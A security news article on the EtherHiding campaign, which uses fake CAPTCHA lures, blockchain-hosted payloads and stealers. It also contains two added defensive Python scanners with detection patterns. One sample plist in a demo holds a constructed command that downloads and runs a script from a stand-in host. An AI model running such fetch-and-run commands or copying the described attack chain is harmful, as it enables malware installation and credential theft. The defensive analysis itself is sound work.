New EtherHiding Attack Uses Web-Based Attacks to Deliver Malware and Rotate Payloads

A new threat known as EtherHiding is reshaping how malware spreads through the internet. Unlike older methods that rely on traditional servers to deliver harmful code, this attack uses blockchain smart contracts to store and update malware payloads.

The approach makes it harder for security teams to track and stop attackers because the payloads can be changed without modifying the websites where the attack begins.

The attack starts when a hacker injects malicious code into a legitimate website. This injected code displays a fake CAPTCHA page that looks like a real security check, asking visitors to prove they are human.

However, instead of clicking a simple checkbox, victims are tricked into copying and pasting code into their terminal or command prompt.

When they follow these instructions, malware quietly installs onto their computer. The technique takes advantage of user trust and shifts the work of running the code to the victim, which helps the malware avoid detection by security tools that watch for automatic malware execution.

Censys security analysts identified this attack pattern while monitoring websites that hosted fake CAPTCHA lures across multiple domains.

Fake CAPTCHA lure (Source - Censys)

During their investigation, researchers discovered an EtherHiding chain that combined blockchain storage, platform-specific malware selection, and social engineering into a complete attack workflow.

The findings revealed how this new approach creates a more flexible and harder-to-track delivery system compared to older methods that used fixed server addresses.

The malware payloads delivered through EtherHiding campaigns typically include commodity stealers like Amos Stealer and Vidar, which are designed to harvest credentials and sensitive information from infected machines.

By combining decentralized staging infrastructure, fake security overlays, and manual user execution, the attackers remove many predictable patterns that defenders traditionally rely on to identify threats.

Blockchain-Powered Payload Delivery Mechanics

The way EtherHiding delivers malware shows how decentralized technology changes attack infrastructure. When a victim visits a compromised website, their browser automatically loads a Base64-encoded JavaScript snippet hidden in the HTML.

This snippet decodes into obfuscated code that contacts smart contracts on the Binance Smart Chain testnet using a function named load_().

The contracts return hex-encoded data that the browser decodes into executable JavaScript, which then determines the victim’s operating system and fetches the appropriate malware version.

The attack uses two distinct contracts to fetch Windows- or macOS-specific payloads. For Windows systems, the code connects to contract 0x46790e2Ac7F3CA5a7D1bfCe312d11E91d23383Ff, while macOS victims are directed to 0x68DcE15C1002a2689E19D33A3aE509DD1fEb11A5.

macOS-specific Click-Fix lure (Source - Censys)

Before delivering the final payload, the attack passes through a control contract at 0xf4a32588b50a59a82fbA148d436081A48d80832A that validates each victim using a unique identifier stored in a persistent cookie.

This gating mechanism allows attackers to selectively enable or disable malware delivery for specific victims simply by changing blockchain data, without touching the compromised website.

Once cleared by the gating contract, the victim sees a platform-specific fake CAPTCHA with instructions tailored to their operating system.

The JavaScript automatically copies malicious commands to the clipboard, and victims are instructed to paste the commands into Terminal on macOS or the Run dialog on Windows.

This manual execution step creates a significant detection gap because no automatic malware behavior occurs: the victim triggers the installation themselves.
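As an added example (not Censys's code and not the loader's own), the following Python scanner looks for the traits of the chain described above in a page's inline scripts: it unwraps Base64-wrapped script bodies, checks for the load_() function, raw eth_call use, the three contract addresses quoted above and clipboard writes, and decodes the ABI-encoded string that an eth_call to a staging contract returns. The clipboard API patterns and the ABI string layout are assumptions about how such a loader is written, not details from the report, and the sample page is constructed.

```python
# Added example (constructed, not Censys's tooling): spot the loader traits the article describes.
import base64
import re

# Contract addresses quoted in the article, lower-cased for matching.
KNOWN_CONTRACTS = {
    "0x46790e2ac7f3ca5a7d1bfce312d11e91d23383ff",  # Windows payload contract
    "0x68dce15c1002a2689e19d33a3ae509dd1feb11a5",  # macOS payload contract
    "0xf4a32588b50a59a82fba148d436081a48d80832a",  # victim-gating contract
}
# Loader traits named in the article (load_(), eth_call); the clipboard API patterns are assumed.
TRAITS = {
    "load_function": re.compile(r"\bload_\s*\("),
    "eth_call": re.compile(r"\beth_call\b"),
    "clipboard_write": re.compile(r"clipboard\.writeText|execCommand\(\s*['\"]copy", re.I),
}
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)

def decode_abi_string(result_hex: str) -> str:
    """Decode an ABI-encoded `string` return value: 32-byte offset, 32-byte length, data."""
    h = result_hex[2:] if result_hex.startswith("0x") else result_hex
    off = int(h[:64], 16) * 2                      # byte offset -> hex-char offset
    length = int(h[off:off + 64], 16)
    return bytes.fromhex(h[off + 64:off + 64 + 2 * length]).decode("utf-8", "replace")

def unwrap_base64(text: str) -> str:
    """Append the decoded form of every long Base64 run so hidden traits still match."""
    layers = [text]
    for m in B64_RE.finditer(text):
        try:
            layers.append(base64.b64decode(m.group(0), validate=True).decode("utf-8", "ignore"))
        except Exception:  # a long identifier or truncated run, not Base64
            continue
    return "\n".join(layers)

def scan_html(html: str) -> dict:
    """Return loader traits and known contract addresses seen in inline scripts."""
    found = {"traits": set(), "contracts": set()}
    for script in SCRIPT_RE.findall(html):
        body = unwrap_base64(script)
        found["traits"].update(n for n, rx in TRAITS.items() if rx.search(body))
        found["contracts"].update(c for c in KNOWN_CONTRACTS if c in body.lower())
    return found

# Constructed sample page: the only visible script is a Base64 blob fed to eval(atob()).
INNER_JS = ("function load_(c){return rpc('eth_call',c)}\nnavigator.clipboard.writeText(cmd);\n"
            "var gate='0xf4a32588b50a59a82fbA148d436081A48d80832A';")
SAMPLE_HTML = '<html><script>eval(atob("%s"))</script></html>' % (
    base64.b64encode(INNER_JS.encode()).decode())
```

Running scan_html over SAMPLE_HTML reports all three traits and the gating contract, while a page whose scripts contain none of them yields empty sets.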

On macOS, the payload uses AppleScript and curl commands to download and execute a full-featured agent. This agent creates persistence using LaunchAgent plist files and retrieves its command-and-control server address from Telegram or Steam profiles by scraping specific HTML elements.

The malware then harvests the user’s plaintext password by displaying a fake System Preferences dialog, synchronizes the stolen credentials with the attacker’s server, and enters a polling loop to receive and execute arbitrary shell commands every thirty seconds.
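The LaunchAgent persistence described above can be audited from the defender's side. As an added example that is not from the Censys report, the following Python script parses every plist in a LaunchAgents directory and flags launch commands that call curl with an output file or a pipe, invoke osascript, run a shell with -c, or execute from temporary or hidden paths; the pattern list is an assumption about what looks out of place in a per-user agent, not indicators from the report, and the sample plists are constructed in a temporary directory.

```python
# Added example (constructed, not from the Censys report): audit per-user LaunchAgent plists
# for the curl/AppleScript launch pattern the article describes. The sample plists are constructed.
import os
import plistlib
import re
import tempfile

# Commands a defender would not expect in a LaunchAgent (assumed list, not report indicators).
SUSPICIOUS = {
    "curl_download": re.compile(r"\bcurl\b.*(-o\b|--output\b|\|)", re.I),
    "osascript": re.compile(r"\bosascript\b"),
    "shell_eval": re.compile(r"\b(sh|bash|zsh)\b\s+-c\b"),
    "temp_or_hidden_path": re.compile(r"(/tmp/|/private/var/folders/|/\.[^/ ]+/)"),
}

def suspicious_args(args: list) -> list:
    """Return the names of SUSPICIOUS patterns found in a joined ProgramArguments list."""
    joined = " ".join(args)
    return [name for name, rx in SUSPICIOUS.items() if rx.search(joined)]

def audit_launch_agents(directory: str) -> list:
    """Parse every .plist in `directory` and report those whose launch command looks hostile."""
    findings = []
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        try:
            with open(os.path.join(directory, name), "rb") as fh:
                plist = plistlib.load(fh)
        except (plistlib.InvalidFileException, ValueError):
            findings.append({"file": name, "hits": ["unparseable_plist"]})  # worth a look too
            continue
        args = plist.get("ProgramArguments") or [plist.get("Program", "")]
        hits = suspicious_args([str(a) for a in args])
        if hits:
            findings.append({"file": name, "label": plist.get("Label"), "hits": hits})
    return findings

def demo() -> list:
    """Write one benign and one constructed hostile plist to a temp dir, then audit it."""
    d = tempfile.mkdtemp()
    hostile_cmd = "curl -s http://c2.invalid/a -o /tmp/.a && osascript /tmp/.a"  # constructed
    samples = {"com.example.sync.plist": ["/usr/bin/true"],
               "com.example.update.plist": ["/bin/sh", "-c", hostile_cmd]}
    for fname, args in samples.items():
        with open(os.path.join(d, fname), "wb") as fh:
            plistlib.dump({"Label": fname[:-6], "RunAtLoad": True, "ProgramArguments": args}, fh)
    return audit_launch_agents(d)
```

Point audit_launch_agents at ~/Library/LaunchAgents to run it against a real user profile; demo() shows the expected output shape on the constructed samples.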

The combination of blockchain smart contracts, fake CAPTCHA social engineering, and local code execution represents a significant shift in attacker tactics.

By moving payload storage onto decentralized infrastructure and removing the need for automatic execution, EtherHiding creates an attack model that is flexible, difficult to predict, and resistant to many traditional security detection methods.

Organizations should monitor for websites displaying fake CAPTCHA overlays and remain vigilant about clipboard activity linked to terminal commands, as these warning signs can help catch this emerging threat before installation occurs.
